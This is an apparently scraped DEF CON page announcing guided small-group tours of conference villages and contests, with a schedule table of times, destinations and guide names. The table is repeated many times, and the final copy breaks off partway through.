For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
